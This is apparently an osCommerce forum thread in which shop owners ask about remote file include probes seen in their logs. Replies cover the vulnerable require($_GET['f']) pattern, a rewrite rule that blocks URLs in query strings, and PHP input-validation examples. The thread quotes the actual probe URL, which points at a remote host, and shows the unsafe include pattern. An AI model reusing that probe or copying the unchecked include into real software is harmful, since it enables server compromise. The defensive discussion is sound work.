
osCommerce

Have I been hacked?


rommany


Hello

I'm getting a strange URL coming up on my Who's Online. I see this popping up many times a day and have no idea why or how it got there. I've removed the first part, and the end bit joioiskioeriyyskwkdwjsdfewis.land.ru does change to a few other addresses, but the URL should just be www.xxxxxxxx.co.uk/baby_names.php

/baby_names.php?f=http://joioiskioeriyyskwkdwjsdfewis.land.ru/.html/body?

So does this look like I have been hacked, and what good would that do them, as the address does not exist?


Find out that person's IP address and ban it from accessing your site.

Ken

commercial support - unProtected channel, not to be confused with the forum with the same name - open to everyone who needs some professional help: either PM/email me, or go to my website (URL can be found in my profile).

over 20 years of computer programming experience.


Thanks Ken

That's a great idea. I can get that from the Who's Online in admin, but I will watch it for a day or so and see how many IP addresses are coming from it. I also will try to see where that IP is registered.

Thanks again


I'm getting the same thing in my store. IP addresses (according to Who's Online) are from Norway, South Carolina and Quebec so far. Can this be right?

I just read an article that SQL injection attacks are going on. Don't know if this applies to us but it got me concerned. SQL Injection Attack


I believe they are trying to do a remote file include exploit, and it would only hurt you if you had something similar to the following:

require($_GET['f']);

I believe stock osCommerce does not do this.

The best thing to do is block any request that has "http://" in the query string.

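The hardened replacement for the require($_GET['f']) pattern discussed above, as an added example that is not part of this thread or of osCommerce itself: the parameter is only ever used as a key into an allow-list of local files, so no URL or path can reach require(), and a separate check flags query strings that carry a URL (WedgeCoop's suggestion, widened to https/ftp and URL-encoded colons) for reviewing logs or Who's Online. The page names in the allow-list are assumptions; the probe URL is the one from the original post.

```php
<?php
// Added example, not osCommerce code or any poster's code. The include target is taken
// from an allow-list keyed by the query value; the value itself never becomes a path.

const ALLOWED_PAGES = [
    'boys'  => 'baby_names_boys.php',   // hypothetical file names, not real osCommerce files
    'girls' => 'baby_names_girls.php',
];

// Returns the local file to include for the "f" value, or null when the value is not an
// allowed key. With an allow-list in place, whether the value contains "http://" no longer
// matters for the include itself; the URL check below is for detection, not protection.
function resolve_page(?string $f): ?string
{
    if ($f === null || !ctype_alnum($f)) {
        return null;
    }
    return ALLOWED_PAGES[$f] ?? null;
}

// Detection: true when any query value carries a URL (http, https or ftp), after
// decoding so that %3A%2F%2F is caught as well. Useful for logs and Who's Online review.
function query_string_carries_url(string $query): bool
{
    $decoded = rawurldecode($query);
    return (bool) preg_match('~(^|[&?=])\s*(https?|ftp)://~i', $decoded);
}

// Constructed sample requests: the probe from the original post plus two legitimate ones.
$samples = [
    '/baby_names.php?f=http://joioiskioeriyyskwkdwjsdfewis.land.ru/.html/body?',
    '/baby_names.php?f=boys',
    '/baby_names.php?f=girls&page=2',
];

foreach ($samples as $uri) {
    $query = (string) parse_url($uri, PHP_URL_QUERY);
    parse_str($query, $params);
    $target  = resolve_page($params['f'] ?? null);
    $flagged = query_string_carries_url($query) ? 'PROBE' : 'ok';
    // The probe resolves to no page (send a 404) and is flagged; the other two resolve normally.
    printf("%-72s -> %-5s include=%s\n", $uri, $flagged, $target ?? 'none (404)');
}
```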

I believe they are trying to do a remote file include exploit, and it would only hurt you if you had something similar to the following:

require($_GET['f']);

I believe stock osCommerce does not do this.

The best thing to do is block any request that has "http://" in the query string.

Thanks a lot WedgeCoop. I've been busy banning. But I don't understand why the IP addresses are so spread out among the world. They are now coming from Kentucky and New York state.

All I know to do is to ban. Thanks again!


I believe they are trying to do a remote file include exploit, and it would only hurt you if you had something similar to the following:

require($_GET['f']);

I believe stock osCommerce does not do this.

The best thing to do is block any request that has "http://" in the query string.

Bit of a stupid question.

A lot of contributions (downloaded from here) have unprotected GETs like this in the admin panel.

Easy fix would be:

mysql_real_escape_string($_GET['f']);

but is this really necessary if the admin panel is .htaccess, IP and login protected and only trusted personnel have access to it?


2 weeks later...

Hello

I'm getting a strange URL coming up on my Who's Online. I see this popping up many times a day and have no idea why or how it got there. I've removed the first part, and the end bit joioiskioeriyyskwkdwjsdfewis.land.ru does change to a few other addresses, but the URL should just be www.xxxxxxxx.co.uk/baby_names.php

/baby_names.php?f=http://joioiskioeriyyskwkdwjsdfewis.land.ru/.html/body?

So does this look like I have been hacked, and what good would that do them, as the address does not exist?

I've been getting the same treatment. I just found this link very helpful:

http://www.webproworld.com/internet-securi...-attackers.html

If anyone has any comments or suggestions about this solution, we would love to read them :)

I am running what is probably an older version of osCommerce. Does anyone know if the newer version now has code in place to prevent these kinds of attacks?


4 months later...

I believe they are trying to do a remote file include exploit, and it would only hurt you if you had something similar to the following:

require($_GET['f']);

I believe stock osCommerce does not do this.

The best thing to do is block any request that has "http://" in the query string.

Is this the correct code to block the http request?

RewriteEngine On
# Match a query string carrying an http:// or https:// URL; [NC] makes the match case-insensitive
RewriteCond %{QUERY_STRING} https?:// [NC]
# Refuse the request with 403 Forbidden. Rewriting to index.php?q=$1 with [QSA] would not
# block anything: it would forward the query string, URL included, to index.php.
RewriteRule .* - [F,L]


Bit of a stupid question.

A lot of contributions (downloaded from here) have unprotected GETs like this in the admin panel.

Easy fix would be:

mysql_real_escape_string($_GET['f']);

but is this really necessary if the admin panel is .htaccess, IP and login protected and only trusted personnel have access to it?

Dangerous advice this imo.

mysql_real_escape_string has nothing to do with the query string; it is for escaping entries into a MySQL database.

e.g. try this

<?php
// mysql_real_escape_string() only escapes the characters that matter inside an SQL string
// literal (quotes, backslash, NUL, newline characters). A URL contains none of them, so it
// comes back unchanged. (The function also needs a MySQL connection and the mysql_*
// extension was removed in PHP 7.)
$url = 'http://www.imahacker.com/index.php?dosomethingnasty=this';
print(mysql_real_escape_string($url));
?>

It prints http://www.imahacker.com/index.php?dosomethingnasty=this

Security Pro is available as a contribution for those who wish to safeguard their query string.


So are people protected with 2.2 RC1? I've installed a few mods.

If you consider that osCommerce has had to run securely over the years with register_globals set to on (which is pretty much unthinkable these days in terms of security), I think it really gives a good indication of the care taken over, and the quality of, the coding.

You really shouldn't worry about a stock osCommerce RC1/2 (although you should always upgrade when the upgrades are available, especially if there are security updates); the problems are the contributions, where there is no code control.


Dangerous advice this imo.

mysql_real_escape_string has nothing to do with the query string; it is for escaping entries into a MySQL database.

e.g. try this

<?php
// mysql_real_escape_string() only escapes the characters that matter inside an SQL string
// literal (quotes, backslash, NUL, newline characters). A URL contains none of them, so it
// comes back unchanged. (The function also needs a MySQL connection and the mysql_*
// extension was removed in PHP 7.)
$url = 'http://www.imahacker.com/index.php?dosomethingnasty=this';
print(mysql_real_escape_string($url));
?>

It prints http://www.imahacker.com/index.php?dosomethingnasty=this

Security Pro is available as a contribution for those who wish to safeguard their query string.

Fudge. You're right.

So what other sanitization method should be implemented (aside from Security Pro, which is already installed)... double sanitization does not hurt.

htmlspecialchars()?

But aren't there ways around this one?


Fudge. You're right.

So what other sanitization method should be implemented (aside from Security Pro, which is already installed)... double sanitization does not hurt.

htmlspecialchars()?

But aren't there ways around this one?

All user input should be checked against the purpose for which it is intended and what is expected.

e.g. if you are expecting a digit you could just force it to be so by using the standard osC function ..

tep_string_to_int($string);

Or just using (int)$var will force the $var into an integer.

Some standard PHP functions are useful such as ..

ctype_alpha()

ctype_digit()

ctype_alnum()


Thanks!!!! I've never come across any of these before.

Bit of a question about them.. there doesn't seem to be much chatter about it on php.net..

My test string (just trying to output the 1st letter of the query string):

$letter = ctype_alpha(substr($_GET['letter'],0,1));

...results in a "1".

Can this only be used in this fashion:

$letter = $_GET['letter'];
if (ctype_alnum($letter)){
//results in my desired output
}else{
require('404.php');
}

If so, what is quicker? preg_replace or if?

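The "check input against what is expected" advice from the reply above and the ctype_alpha() question just asked, worked through in one added example that is not code from this thread or from osCommerce: ctype_alpha() returns true or false (hence the "1"), so it is used as a guard and the original value is what gets kept, with the 404 fallback the poster already uses. One function per ctype check the reply lists; the parameter names, the sort allow-list and the sample requests are constructed.

```php
<?php
// Added example, not osCommerce or any poster's code. Each validator knows what its
// parameter is supposed to be and returns either a safe value or a rejection marker.

// ?letter=B : expecting exactly one alphabetic character. ctype_alpha() is the test, not
// the result; the poster's "1" was the boolean true being printed.
function validate_letter(array $get): ?string
{
    $letter = $get['letter'] ?? '';
    $ok = is_string($letter) && strlen($letter) === 1 && ctype_alpha($letter);
    return $ok ? strtoupper($letter) : null;   // null means "send the 404 page"
}

// ?page=3 : expecting a digit string, then cast, like tep_string_to_int() / (int).
// ctype_digit() rejects signs, spaces and "3abc"; (int) alone would quietly turn "3abc" into 3.
function validate_page(array $get): int
{
    $page = $get['page'] ?? '1';
    return (is_string($page) && ctype_digit($page)) ? max(1, (int) $page) : 1;
}

// ?sort=nameasc : expecting a letters-and-digits token from a known list; ctype_alnum()
// first, then the allow-list, falling back to the first allowed value.
function validate_sort(array $get, array $allowed): string
{
    $sort = $get['sort'] ?? '';
    return (is_string($sort) && ctype_alnum($sort) && in_array($sort, $allowed, true)) ? $sort : $allowed[0];
}

// Constructed sample requests standing in for $_GET: one clean, two malformed.
$requests = [
    ['letter' => 'b',   'page' => '3',    'sort' => 'nameasc'],
    ['letter' => 'b1',  'page' => '3abc', 'sort' => 'name asc'],
    ['letter' => ['x'], 'page' => '-2',   'sort' => ''],
];

foreach ($requests as $get) {
    $letter = validate_letter($get);
    if ($letter === null) {
        // The poster's own pattern: fall through to the 404 page rather than guess.
        echo "letter: rejected -> require('404.php')\n";
    } else {
        echo "letter: {$letter}\n";
    }
    printf("page: %d, sort: %s\n\n", validate_page($get), validate_sort($get, ['nameasc', 'namedesc']));
}
```

Only the first request keeps its values (B, 3, nameasc); the other two fall back to the 404 page for the letter and to the defaults 1 and nameasc for the rest.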
